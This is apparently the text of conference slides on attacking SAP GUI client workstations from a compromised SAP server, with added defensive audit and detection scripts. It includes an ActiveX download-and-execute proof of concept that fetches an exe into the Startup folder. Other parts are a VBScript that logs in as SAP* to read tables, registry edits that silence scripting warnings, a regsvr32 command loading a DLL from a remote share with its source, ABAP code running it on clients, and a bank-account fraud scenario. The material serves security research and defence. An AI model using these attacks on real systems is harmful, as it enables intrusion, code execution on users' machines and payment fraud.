![Page 1: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/1.jpg)
whoami
Yet another security researcher: @_chipik
Business application security expert
whoami
Areas of research: security architecture, digital signatures, data retention, business process reengineering.
Head of Professional Services
Agenda
Why?
Most critical vulnerabilities
History
Motivation
DBACockpit transaction
Main research
Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc! Calc!
Demo2
JAVA GUI
SAP Frontend Security
SAP Frontend Security: SAP NetWeaver
SAP Frontend Security: Why attack users?
• Users are less secure than servers
• There are thousands of SAP users in one company
• Attackers can reach them even if the server is fully secured
• Attackers can reach them from outside the perimeter
• Attackers can use compromised clients as a proxy for attacking servers
SAP Frontend Security: Typical client software for SAP
• SAP GUI (for Windows)
• SAP GUI for Java
• Web GUI
• NWBC
• RFC clients
• Applications such as Visual Admin, the mobile client and many others
SAP Frontend Security: SAP Frontend (SAP GUI)
• Most common client
• Installed on almost every SAP workstation in a company
• No integrated auto-update mechanism
• Rarely patched
History of attacks: ActiveX and GUI Scripting
SAP Frontend Security: SAP GUI ActiveX
• About 1000 ActiveX controls ship with SAP GUI
• Vulnerabilities have been found in 16 of them
• Any of them is potentially vulnerable
• User interaction is needed to exploit them (the victim must open a page that instantiates the control)
• Success rates of 10-50% depending on user awareness
SAP Frontend Security: SAP GUI, history of ActiveX attacks

| Vulnerable component | Author | Vulnerability |
|---|---|---|
| Rfcguisink | Mark Litchfield | BOF |
| Kwedit | Mark Litchfield | BOF |
| Mdrmsap | Will Dormann | BOF |
| Sizerone | Carsten Eiram | BOF |
| WebViewer3D | Will Dormann | BOF |
| Kwedit | Carsten Eiram | Insecure method |
| Sapirrfc | Alexander Polyakov | BOF |
| WebViewer3D | Alexander Polyakov | Insecure method |
| WebViewer2D | Alexander Polyakov | Insecure method |
| VxFlexgrid | Elazar Broad, Alexander Polyakov | BOF |
| BExGlobal | Alexey Sintsov | Insecure method |
| Kwedit | Alexander Polyakov, Alexey Troshichev | Insecure method |
| RFCSDK | Alexey Sintsov | Memory corruption |
| RFCSDK | Alexey Sintsov | Format string |
| ERPSCAN-00173 | Alexander Polyakov | Insecure method |
| NWBC | Alexey Sintsov | Memory corruption |
SAP Frontend Security: SAP GUI memory corruptions
• The first examples were found by Mark Litchfield
• Vulnerable components: kwedit and rfcguisink
• Later more buffer overflows were found in SAP ActiveX controls
• Successful exploitation gives full remote control of the workstation
• Exploits are publicly available for most of these vulnerabilities
SAP Frontend Security: SAP GUI insecure methods
There are ActiveX controls whose methods can:
• Download and execute files (e.g. Trojans)
• Run arbitrary OS commands
• Read or write files
• Overwrite or delete files
• Steal credentials
• Connect to SAP servers
SAP Frontend Security: Insecure methods (Download and Exec)
• An attacker can download a Trojan to the victim's PC and save it in the Startup folder so that it runs at the next logon.
• Fixed with security note 1294913; a workaround is provided with security note 1092631.

Proof of concept (ERPScan). The page instantiates the vulnerable control and calls its download method with a traversal path pointing into the all-users Startup folder:

```html
<html>
<title>ERPScan SAP ActiveX download and execute</title>
<object classid="clsid:2137278D-EF5C-11D3-96CE-0004AC965257" id="test"></object>
<script language="Javascript">
function init()
{
  // Fetched from the attacker's host, written through a traversal path into
  // the all-users Startup folder, so it is executed at the next logon.
  var url = "http://172.16.0.1/notepad.exe";
  var FileName = '/../../../../../../../../../Documents and Settings/All Users/Start menu/Programs/Startup/notepad.exe';
  test.Comp_Download(url, FileName);
}
init();
</script>
</html>
```

[ERPSCAN-09-045]
SAP Frontend Security: Insecure scripting

| Method 1 (Logon ActiveX controls) | Method 2 (GUI Scripting) |
|---|---|
| Many ActiveX controls execute SAP functions | SAP users can run scripts to automate their work |
| SAP.LogonControl connects using the RFC protocol | Widespread and generally turned on |
| SAP.TableFactory selects data from tables | Can be disabled or enabled via a registry value or, from version 7.2, a server parameter |
| Exploit can connect to the SAP server and select critical data | Exploit can connect to SAP and do everything the user can do |
SAP Frontend Security: Insecure scripting

Method 1 in practice: a script that uses the logon ActiveX controls to connect via RFC and read a table (here KNA1, the customer master) from the client side:

```vb
Dim LogonControl, funcControl, TableFactoryCtrl, conn

Sub Main()
    Set LogonControl = CreateObject("SAP.LogonControl.1")
    Set funcControl = CreateObject("SAP.Functions")
    Set TableFactoryCtrl = CreateObject("SAP.TableFactory.1")
    Call R3Logon
    funcControl.Connection = conn
    Call R3RFC_READ_TABLE("KNA1")
    conn.Logoff
    MsgBox "Logged off from R/3!"
End Sub

Sub R3Logon()
    Set conn = LogonControl.NewConnection
    conn.ApplicationServer = "172.16.1.14" ' IP or DNS name of the R/3 application server
    conn.System = "00"                     ' system number of the instance, usually 00
    conn.Client = "000"                    ' client to log on to
    conn.Language = "EN"                   ' logon language
    conn.User = "SAP*"                     ' user id
    conn.Password = "06071992"             ' password
    If conn.Logon(0, True) <> True Then    ' True = silent logon, no logon dialog shown
        MsgBox "Cannot log on!"
    End If
End Sub

Sub R3RFC_READ_TABLE(pQueryTab)
    Dim RFC_READ_TABLE, eQUERY_TAB, TOPTIONS, TDATA
    Set RFC_READ_TABLE = funcControl.Add("RFC_READ_TABLE")
    Set eQUERY_TAB = RFC_READ_TABLE.Exports("QUERY_TABLE")
    Set TOPTIONS = RFC_READ_TABLE.Tables("OPTIONS")
    Set TDATA = RFC_READ_TABLE.Tables("DATA")
    eQUERY_TAB.Value = pQueryTab ' pQueryTab is the R/3 name of the table
    TOPTIONS.AppendRow ' new item line
    'TOPTIONS(1, "TEXT") = "MANDT EQ '000'"
    If RFC_READ_TABLE.Call = True Then
        If TDATA.RowCount > 0 Then
            MsgBox TDATA(1, "WA")
        Else
            MsgBox "Call to RFC_READ_TABLE successful! No data found"
        End If
    Else
        MsgBox "Call to RFC_READ_TABLE failed!"
    End If
End Sub
```
SAP Frontend Security: Insecure scripting (attack scenario)
• Change the bank account information of a company selected from the customer list to our own bank account
  o Next time someone makes a transfer to this company, the money is sent to us
  o Afterwards the attacker simply runs the script again to change it back
• In SAP the LFBK table stores the main information about bank accounts
• The major fields of this table are:
  o BANKN – bank account number
  o IBAN – International Bank Account Number
SAP Frontend Security: Insecure scripting (attack)
• Turn off the security warning the user sees when GUI Scripting attaches to or connects to a session:
  [HKEY_CURRENT_USER\Software\SAP\SAPGUI Front\SAP Frontend Server\Security]
  "WarnOnAttach"=dword:00000000
  "WarnOnConnection"=dword:00000000
• Wait 210 milliseconds while the registry values are changed
• Open a SAP GUI window and minimize it to the tray
• Run transaction SE16N (table maintenance)
• Open the LFBK table with the &SAP_EDIT option
• Create a copy of a bank account entry, change BANKN, delete the original
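The registry values the script flips are also what a defender should audit. The following Python script is an added example, not code from the talk: it parses a `.reg` export of the SAP GUI scripting security key (the one shown above) and flags WarnOnAttach or WarnOnConnection set to 0 and UserScripting set to 1. The sample export is constructed; UserScripting is SAP GUI's client-side switch for scripting as a whole and is an addition to what the slide lists. The server-side profile parameter sapgui/user_scripting is the other half of the control and is not covered by a client export.

```python
"""Audit SAP GUI scripting settings from a Windows .reg export (added example)."""
import re

# Key shown on the slide; reg.exe writes exports as UTF-16, decode accordingly.
KEY = r"HKEY_CURRENT_USER\Software\SAP\SAPGUI Front\SAP Frontend Server\Security"

# Hardened state: warn on attach/connect, and client-side scripting switched off.
EXPECTED = {"WarnOnAttach": 1, "WarnOnConnection": 1, "UserScripting": 0}

# Constructed sample export showing the state the attack leaves behind.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\SAP\SAPGUI Front\SAP Frontend Server\Security]
"WarnOnAttach"=dword:00000000
"WarnOnConnection"=dword:00000000
"UserScripting"=dword:00000001
"ShowNativeWinDlgs"=dword:00000001
"""


def parse_reg(text):
    """Return {key_path: {value_name: value}}; dword values become ints."""
    result, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            result.setdefault(current, {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and current is not None:
            name, raw = m.group(1), m.group(2)
            if raw.startswith("dword:"):
                result[current][name] = int(raw[len("dword:"):], 16)
            else:
                result[current][name] = raw.strip('"')
    return result


def audit_scripting_settings(reg_text):
    """Return a list of findings; an empty list means the client matches EXPECTED."""
    values = parse_reg(reg_text).get(KEY, {})
    findings = []
    for name, want in EXPECTED.items():
        got = values.get(name)
        if got is None:
            # Not set explicitly: SAP GUI uses its built-in default. Set it via
            # GPO so the state is known rather than assumed.
            findings.append(f"{name} not set (built-in default applies)")
        elif got != want:
            findings.append(f"{name}={got}, expected {want}")
    return findings


if __name__ == "__main__":
    # Real use: open("out.reg", encoding="utf-16").read() from `reg export`.
    for finding in audit_scripting_settings(SAMPLE_REG):
        print("FINDING:", finding)
```

Run it against an export taken with `reg export "HKCU\Software\SAP\SAPGUI Front\SAP Frontend Server\Security" out.reg`; three findings on the sample, none once the values are restored.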
demo 0
New vectors: from server to client
Most critical vulnerabilities
How to get admin privileges in SAP?
• Over 500 companies had a vulnerable CTC servlet (RCE, 2011)
• ...
• 3 Java serialization exploits (RCE without authorization, 2015)
• Information disclosure + SQL injection + crypto issue + misconfiguration = RCE (Black Hat 2016)
• DoS + DoS + race condition + auth bypass = RCE (Troopers 2016)
• Anonymous directory traversal + privilege escalation = RCE (patch in progress)
How to get admin privileges in SAP? Google it: sap password site:trello.com
demo 1
SAP GUI: motivation

Goal: attack SAP users from a compromised SAP server.

While executing transaction DBACockpit to manage the database, we noticed that SAP GUI offers to open the database management program. After clicking the web browser button, SAP GUI launched the web browser and opened the URL without any security notification.

Interesting! Maybe we can start any program on the client's computer...
dbacockpit
Browser ...
Example of a program which runs calc
Looking for answers in forums
We have 3 ways to get past the security prompt:
• Open some URL with a vulnerable/malicious ActiveX control using IE
• Analyze sapfesec.dll, which SAP GUI uses to draw the prompt
• Search for mistakes in the whitelist of EXE files
sapfesec.dll
Whitelist? What? regsvr32?
.\FrontEnd\SAPgui\SAPrules.xml
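To check an installation for this class of mistake, here is an added Python example (not from the talk): it walks SAPrules.xml, or any XML playing the same role, and reports every rule that names a known living-off-the-land binary unless the rule explicitly denies it. The exact rule schema is not reproduced on the slide, so the checker is schema-agnostic and looks at every attribute and text value; the sample XML and its attribute names are constructed to show the case the slide describes, regsvr32 on the allow list.

```python
"""Flag LOLBins in a SAP GUI execution whitelist such as SAPrules.xml (added example)."""
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Windows binaries that load or run attacker-controlled code given the right
# arguments. None of them should be startable from an SAP server's ABAP.
LOLBINS = {
    "regsvr32.exe", "rundll32.exe", "mshta.exe", "regasm.exe", "regsvcs.exe",
    "installutil.exe", "msbuild.exe", "cscript.exe", "wscript.exe",
    "powershell.exe", "cmd.exe", "certutil.exe", "msiexec.exe", "bitsadmin.exe",
}

# Constructed sample; element and attribute names are assumed, not SAP's schema.
SAMPLE_RULES = """<Rules>
  <Rule Type="Execute" Program="C:\\Program Files\\SAP\\FrontEnd\\SAPgui\\saplogon.exe" Action="Allow"/>
  <Rule Type="Execute" Program="%SystemRoot%\\System32\\regsvr32.exe" Action="Allow"/>
  <Rule Type="Execute" Program="C:\\Windows\\notepad.exe" Action="Ask"/>
  <Rule Type="Execute" Program="%windir%\\system32\\rundll32.exe" Action="Allow"/>
  <Rule Type="Execute" Program="powershell.exe" Action="Deny"/>
</Rules>
"""


def basename(value):
    """Last path component, lower-cased; copes with backslashes and %ENV% prefixes."""
    return PureWindowsPath(value.strip()).name.lower()


def find_lolbin_rules(xml_text, deny_values=("deny",)):
    """Return (program, action) pairs for rules naming a LOLBin that are not explicit denies."""
    root = ET.fromstring(xml_text)
    hits = []
    for elem in root.iter():
        # Schema-agnostic: look at every attribute value and any element text.
        values = list(elem.attrib.values()) + ([elem.text] if elem.text else [])
        action = next((v for k, v in elem.attrib.items() if k.lower() == "action"), "")
        for v in values:
            if basename(v) in LOLBINS and action.lower() not in deny_values:
                hits.append((v.strip(), action))
    return hits


if __name__ == "__main__":
    # Real use: open(r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saprules.xml").read()
    for program, action in find_lolbin_rules(SAMPLE_RULES):
        print(f"{action or '?':6} {program}")
```

On the sample this reports regsvr32.exe and rundll32.exe (both allowed) and stays quiet about the denied powershell.exe; the fix for the real file is SAP security note 2407616, mentioned later in the talk.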
regsvr32

Regsvr32, aka "Microsoft Register Server", is a command-line utility in Microsoft Windows for registering and unregistering DLLs and ActiveX controls in the Windows Registry.

The utility regsvr32.exe ships with Windows and is designed to load DLLs and run the code in their registration exports (DllRegisterServer, and DllInstall when /i is given). It will happily load a DLL from a UNC path:

```text
regsvr32.exe /i /s \\SOME_SMB_SHARE\dir\EVIL.dll
```

/s suppresses the message boxes, so the user sees nothing.

Regsvr32: EVIL.DLL source code

```c
#include <windows.h>
#include <shellapi.h>

/* regsvr32 calls this export while "registering" the DLL; the PoC payload
   just starts calc. Build as x64, or use a .def file on x86, so the export
   name is not decorated and regsvr32 can resolve it. */
__declspec(dllexport) HRESULT __stdcall DllRegisterServer(void)
{
    ShellExecuteA(0, "open", "c:\\Windows\\System32\\calc.exe", 0, 0, 0);
    return S_OK;
}
```
Call regsvr32 from ABAP

```abap
CALL FUNCTION 'WS_EXECUTE'
  EXPORTING
    program     = 'c:\Windows\System32\regsvr32.exe'
    commandline = '/i /s \\REMOTE_FOLDER\tmp\evil.dll'
    INFORM      = ''
  EXCEPTIONS
    FRONTEND_ERROR     = 1
    NO_BATCH           = 2
    PROG_NOT_FOUND     = 3
    ILLEGAL_OPTION     = 4
    GUI_REFUSE_EXECUTE = 5
    OTHERS             = 6.
```
Attack scenario
Threat modelling
• Attacker with exploits
• ABAP developer
Create a new EVIL_DEV user with SAP_ALL rights
Create a malicious program

Developer key?

It's no problem

Insert, save and activate the malicious program
Create a custom transaction with SE93
Connect the custom transaction to the malicious program
Set mlauncher as the default (start) transaction

After the user logs in to the system, transaction mlauncher is executed.

Flow: SAP server → SAP GUI runs regsvr32 via WS_EXECUTE → malicious DLL request → remote folder with evil.dll → evil.dll is loaded and run on the client.
demo 2
![Page 56: whoami - SAP Cyber Security Solutions€¦ · whoami Areas of research: ... Analyze sapfesec.dll which uses SAP GUI to ... Call regsvr32 from ABAP CALL FUNCTION 'WS_EXECUTE' EXPORTING](https://reader030.vdocuments.site/reader030/viewer/2022020108/5adbabfe7f8b9a6d318e7084/html5/thumbnails/56.jpg)
Solution
SAP security note 2407616
CVE-2017-6950
SAP JAVA GUI
• Works great on SAP GUI for Windows
• What about SAP GUI for Java?
SAP JAVA GUI: Trust levels
• When a client connects to a server for the first time, a trust level for that SAP server has to be defined
SAP JAVA GUI: Productive trust level
We can execute any program on the client's computer without user interaction
Malicious code: trusted system

```abap
CALL FUNCTION 'WS_EXECUTE'
  EXPORTING
    program     = 'calc.exe'
    commandline = ''
    INFORM      = ''
  EXCEPTIONS
    FRONTEND_ERROR     = 1
    NO_BATCH           = 2
    PROG_NOT_FOUND     = 3
    ILLEGAL_OPTION     = 4
    GUI_REFUSE_EXECUTE = 5
    OTHERS             = 6.
```
Flow (trusted system): login request to TRUSTED SAP → user successfully logged in → malicious ABAP code executes on the client
SAP JAVA GUI: Untrusted trust level
We can't execute a program on the client's computer
SAP JAVA GUI: Untrusted trust level
• We can't execute a program on the client's computer
• BUT it is possible to connect the user to another SAP server
SAP JAVA GUI: RCE
• Productive
  • just execute any program via WS_EXECUTE
• Untrusted
  • connect the user to a productive system
  • execute any program via WS_EXECUTE there
Malicious code: untrusted system

```abap
CALL FUNCTION 'WS_EXECUTE'
  EXPORTING
    program     = ' Gmux\sapgui'
    commandline = '/H/TRUSTED_SERVER/S/3201&clnt=800&user=SAP*&pass=06071992&tran=MAL_TRANZ'
    INFORM      = ''
  EXCEPTIONS
    FRONTEND_ERROR     = 1
    NO_BATCH           = 2
    PROG_NOT_FOUND     = 3
    ILLEGAL_OPTION     = 4
    GUI_REFUSE_EXECUTE = 5
    OTHERS             = 6.
```
Flow (untrusted system):
• UNTRUSTED SAP: login request → user successfully logged in → the ABAP code there re-launches the client with a connection string for the TRUSTED server
• TRUSTED SAP: login request with the supplied credentials → user successfully logged in → malicious ABAP code (transaction MAL_TRANZ) executes and starts a program on the client
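Both chains shown above, the Windows one (SAP GUI starting regsvr32 with a UNC path) and the Java GUI one (the client re-launched with user= and pass= in its connection string), leave a footprint in ordinary process-creation telemetry. The Python below is an added example, not from the talk: it classifies Sysmon-style process-creation events and tags the patterns those chains produce. The events are constructed; the field names follow Sysmon EventID 1 and the SAP GUI image names are assumptions to adapt to your environment. Whether the server-side code uses the obsolete WS_EXECUTE function module shown on the slides or its replacement CL_GUI_FRONTEND_SERVICES=>EXECUTE, the result is a process started by the GUI on the client, which is what this catches.

```python
"""Tag SAP GUI server-to-client abuse in process-creation events (added example)."""
import re

# Image names of the SAP GUI processes (Windows and Java GUI); assumed set.
SAP_GUI_PARENTS = {"saplogon.exe", "sapgui.exe", "nwbc.exe", "sapgui"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "powershell.exe",
           "cmd.exe", "wscript.exe", "cscript.exe"}
UNC_RE = re.compile(r"(?<![\w:])\\\\[\w.$-]+\\", re.IGNORECASE)          # \\host\share
# Java GUI connection string carrying credentials, as on the slide above.
LOGON_STRING_RE = re.compile(r"/H/\S+?/S/\d+.*?(?:user|pass)=", re.IGNORECASE)

# Constructed sample events in Sysmon EventID 1 shape.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
     "CommandLine": r"regsvr32.exe /i /s \\REMOTE_FOLDER\tmp\evil.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",          # benign local registration
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},
    {"Image": r"C:\Program Files\SAP Clients\SAPGUI\sapgui.exe",
     "ParentImage": r"C:\Program Files\SAP Clients\SAPGUI\sapgui.exe",
     "CommandLine": r"sapgui /H/TRUSTED_SERVER/S/3201&clnt=800&user=SAP*&pass=06071992&tran=MAL_TRANZ"},
    {"Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Program Files\SAP Clients\SAPGUI\sapgui.exe",
     "CommandLine": r"calc.exe"},
    {"Image": r"C:\Windows\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe report.txt"},
]


def image_name(path):
    """Lower-cased file name of an image path (either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return alert tags for one process-creation event; empty list means benign."""
    image = image_name(event["Image"])
    parent = image_name(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    tags = []
    from_sap_gui = parent in SAP_GUI_PARENTS
    if from_sap_gui and image in LOLBINS:
        tags.append("sapgui_spawns_lolbin")
    if image == "regsvr32.exe" and UNC_RE.search(cmd):
        tags.append("regsvr32_unc_dll")            # DLL pulled from an SMB share
    if LOGON_STRING_RE.search(cmd):
        tags.append("sapgui_credentials_on_cmdline")  # Java GUI re-logon trick
    if from_sap_gui and image not in SAP_GUI_PARENTS and not tags:
        # Anything else the GUI launches (the talk's calc.exe) belongs on a hunt list.
        tags.append("sapgui_child_process")
    return tags


def scan(events):
    """Return [(index, tags)] for every event that produced at least one tag."""
    hits = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            hits.append((i, tags))
    return hits


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"], "->", ", ".join(tags))
```

The second event is deliberately benign (a local installer registering a COM DLL) to show that the UNC check, not regsvr32 itself, is what separates the attack from normal administration.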
demo 3
Solution
The presented SAP GUI for Java attack is possible only when the R/3 system in use explicitly allows applications to be executed without any interaction.
Furthermore, an attacker has to place malware on a trusted system beforehand.
That’s it? Nope.
"bonus"
ransomware
One type of malware
Most popular ransomware families: CryptoLocker, TorrentLocker, CryptoWall, Fusob (for mobile)
Initial ransom ranges from $150 to $2,000 (Cryptomix)
"bonus" video
Defending against SAP ransomware attacks
Recap: Attack Chain
What failed?
Action Plan
1. Patch saprules.xml on all SAP GUI for Windows clients
• see SAP Security Note 2407616 for more details
2. Scan for SAP vulnerabilities on application servers and develop a remediation plan
3. Check all ABAP programs for the presence of malicious code
4. Configure the SAP Security Audit Log and other log sources
5. Develop an approach to detect SAP security threats:
• manual review of SAP security events
• configure IDS to detect SAP attack signatures
• connect logs to a SIEM
• review privileged account activity
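Step 3 of the plan calls for checking all ABAP programs for malicious code. The scanner below is an added example, not code from the talk or from ERPScan's products: it strips ABAP comments (full-line `*` and inline `"`), then flags the front-end execution call the talk describes, CALL FUNCTION 'WS_EXECUTE', together with string literals naming regsvr32. The extra API names (GUI_RUN, GUI_EXEC, CL_GUI_FRONTEND_SERVICES=>EXECUTE), the other Windows binary names, and the two sample programs are assumptions constructed for this example, not anything shown in the talk.

```python
"""Scan ABAP source for front-end command execution and suspicious literals.

Added example (not from the talk). ABAP comments are stripped first so that
commented-out code does not raise alerts.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Front-end execution APIs. WS_EXECUTE is the one named in the talk; GUI_RUN,
# GUI_EXEC and CL_GUI_FRONTEND_SERVICES=>EXECUTE are other SAP-delivered calls
# that start a program on the SAP GUI host (assumption: illustrative, not exhaustive).
FRONTEND_EXEC_PATTERNS = [
    r"CALL\s+FUNCTION\s+'WS_EXECUTE'",
    r"CALL\s+FUNCTION\s+'GUI_RUN'",
    r"CALL\s+FUNCTION\s+'GUI_EXEC'",
    r"CL_GUI_FRONTEND_SERVICES\s*=>\s*EXECUTE\b",
]

# Windows binaries that rarely belong in business code. regsvr32 is the one the
# talk uses; the others are assumptions based on common living-off-the-land tooling.
SUSPICIOUS_LITERALS = [r"\bregsvr32\b", r"\brundll32\b", r"\bmshta\b",
                       r"\bpowershell\b", r"\bcmd\.exe\b", r"\bwscript\b", r"\bcscript\b"]


@dataclass
class Finding:
    program: str
    line: int
    kind: str      # "frontend_exec" or "suspicious_literal"
    text: str      # offending source line, comment stripped


def strip_abap_comment(line: str) -> str:
    """A '*' in column 1 comments the whole line; a '"' outside a quoted
    literal ('...' or `...`) comments the rest of the line."""
    if line.startswith("*"):
        return ""
    quote = None
    for i, ch in enumerate(line):
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", "`"):
            quote = ch
        elif ch == '"':
            return line[:i]
    return line


def scan_program(name: str, source: str) -> List[Finding]:
    """Return one finding per line per category (first matching pattern wins)."""
    findings: List[Finding] = []
    for lineno, raw in enumerate(source.splitlines(), start=1):
        code = strip_abap_comment(raw)
        if not code.strip():
            continue
        for pat in FRONTEND_EXEC_PATTERNS:
            if re.search(pat, code, re.IGNORECASE):
                findings.append(Finding(name, lineno, "frontend_exec", code.strip()))
                break
        for pat in SUSPICIOUS_LITERALS:
            if re.search(pat, code, re.IGNORECASE):
                findings.append(Finding(name, lineno, "suspicious_literal", code.strip()))
                break
    return findings


def scan_all(sources: Dict[str, str]) -> Dict[str, List[Finding]]:
    return {name: scan_program(name, src) for name, src in sources.items()}


# Constructed sample sources (not real customer code): a harmless report whose
# WS_EXECUTE mention is only a comment, and a backdoor that reaches regsvr32
# through WS_EXECUTE.
SAMPLE_SOURCES = {
    "ZREPORT_OK": (
        "REPORT zreport_ok.\n"
        "* CALL FUNCTION 'WS_EXECUTE' was removed; this is a comment only\n"
        "DATA lv_msg TYPE string. \" regsvr32 mentioned in a comment, not code\n"
        "WRITE 'hello'.\n"
    ),
    "ZBACKDOOR": (
        "REPORT zbackdoor.\n"
        "DATA lv_cmd TYPE string VALUE 'regsvr32'.\n"
        "DATA lv_args TYPE string VALUE '/s evil.dll'.\n"
        "CALL FUNCTION 'WS_EXECUTE'\n"
        "  EXPORTING program = lv_cmd commandline = lv_args\n"
        "  EXCEPTIONS FRONTEND_ERROR = 1 NO_BATCH = 2 PROG_NOT_FOUND = 3\n"
        "             ILLEGAL_OPTION = 4 GUI_REFUSE_EXECUTE = 5 OTHERS = 6.\n"
    ),
}

if __name__ == "__main__":
    for prog, hits in scan_all(SAMPLE_SOURCES).items():
        print(f"{prog}: {len(hits)} finding(s)")
        for f in hits:
            print(f"  line {f.line} [{f.kind}] {f.text}")
```

Run it over exported ABAP source text of all customer (Z/Y) programs; a hit is a starting point for manual review rather than proof of malice, since legitimate programs may also call these APIs, and a backdoor can assemble the binary name at runtime, which a literal search will not see.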
Send your questions and requests
How We Can Help?
SAP Security Consulting:
• Implementation of an SAP Vulnerability Management process
• SAP security plans, architecture and project documents expertise
• SAP risk assessment
ERPScan Monitoring Suite:
• SAP vulnerability assessment
• Source Code scanning
• Segregation of Duties assessment
SAP Penetration Testing:
• simulate external and internal attacks
• provide a list of vulnerabilities
• escalate privileges and show you how much data can leak
• try to reach connected systems
• estimate overall harm to business operations
SAP Security Audit:
• security assessment of network, OS and DBMS related to SAP
• SAP vulnerability assessment
• security configuration checks
• critical access control checks
• custom code security review (optional)
• segregation of duties analysis (optional)
Thank you
Michael Rakutko, Head of Professional Services
Dmitry Chastuhin, Lead SAP Security Analyst
USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301
HQ Netherlands: Luna ArenA, 238 Herikerbergweg, 1101 CM Amsterdam